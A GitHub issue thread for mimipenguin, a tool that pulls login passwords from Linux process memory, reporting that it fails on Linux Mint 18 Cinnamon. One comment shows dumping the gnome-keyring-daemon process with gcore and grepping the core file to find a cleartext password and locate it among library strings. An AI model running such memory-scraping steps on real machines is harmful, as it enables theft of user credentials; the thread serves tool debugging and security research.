### ISSUE TITLE
Mint Cinnamon is not supported

### ISSUE THREAD

**Issue by M1chael** [huntergregal/mimipenguin#22]
No results for Linux Mint 18 Cinnamon kernel 4.4.0-72 x86_64.

**Comment by huntergregal** [comment]
Hi, thank you for reporting issues to us. 
Tip: If you're reporting a bug, remove the feature request section for your convenience. 

## Bug report

Write a description 

#### Information
Target OS info
- run `cat /etc/issue`
- run `ps aux | grep -e "gnome-keyring" -e gdm`

### Current behavior 
Write the current behavior and/or screenshot

### Expected behavior 
Write the expected behavior and/or screenshot

## Feature request
Write a description 
#### Information
Target OS info
- run `cat /etc/issue`

### Expected behavior 
Write the expected behavior and/or screenshot

### Reproduce Steps
if you know how to do it, please explain the steps. This would help use to speed up adding this feature

**Comment by M1chael** [comment]
# Bug report
No results for Linux Mint 18 Cinnamon kernel 4.4.0-72 x86_64.
- `Linux Mint 18 Sarah \n \l`
- `michael   2105  0.0  0.0 209340  7372 ?        SLl  19:41   0:02 /usr/bin/gnome-keyring-daemon --start --components=secrets`
## Current behavior
Empty result
## Expected behavior
User password
## Reproduce Steps
```
git clone https://github.com/huntergregal/mimipenguin.git
cd mimipenguin/
sudo ./mimipenguin.sh
[sudo] password for michael: 
MimiPenguin Results:
```

**Comment by bcoles** [comment]
+1 for not working with `gnome-keyring` on Linux Mint 18 Cinnamon.

```
mint-18 mimipenguin # ./mimipenguin.sh 
MimiPenguin Results:
```

```
mint-18 mimipenguin # cat /etc/os-release 
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial
```

```
mint-18 mimipenguin # ps aux | grep -e gnome-keyring -e gdm
user      1794  0.0  1.2 205260 12604 ?        Sl   22:34   0:00 /usr/bin/gnome-keyring-daemon --daemonize --login
test      2589  0.0  0.9 205268  9464 ?        Sl   22:35   0:00 /usr/bin/gnome-keyring-daemon --daemonize --login
root      7857  0.0  0.0  14232   924 pts/0    S+   22:50   0:00 grep --color=auto -e gnome-keyring -e gdm
```

The passwords are still present in memory, however they've moved, as per below :

```
mint-18 mimipenguin # gcore $(pgrep gnome-keyring)
[New LWP 1989]
[New LWP 1988]
[New LWP 1795]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
0x00007fe5c71e174d in poll () at ../sysdeps/unix/syscall-template.S:84
84	../sysdeps/unix/syscall-template.S: No such file or directory.
warning: target file /proc/1794/cmdline contained unexpected null characters
Saved corefile core.1794
[New LWP 2717]
[New LWP 2716]
[New LWP 2590]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
0x00007fbbddc3374d in poll () at ../sysdeps/unix/syscall-template.S:84
84	../sysdeps/unix/syscall-template.S: No such file or directory.
warning: target file /proc/2589/cmdline contained unexpected null characters
Saved corefile core.2589
mint-18 mimipenguin # strings core.* | grep secretpw -B 5 -A 5
/usr/lib/x86_64-linux-gnu/libgio-2.0.so.0
libgio-2.0.so.0
/usr/lib/x86_64-linux-gnu
libgio-2.0.so.0
/usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0
secretpw
;*3$"
N=)9<
linux-vdso.so.1
tls/x86_64/
/usr/lib/x86_64-linux-gnu/libgcr-base-3.so.1
```

Note that the position in memory is similar to the position in Ubuntu 16 (between `libgobject-2.0.so.0` and `linux-vdso.so.1`), as per #26, which makes sense as Mint 18 is based on Ubuntu 16.

**Comment by bcoles** [comment]
The hash no longer appears to be stored in the process memory.
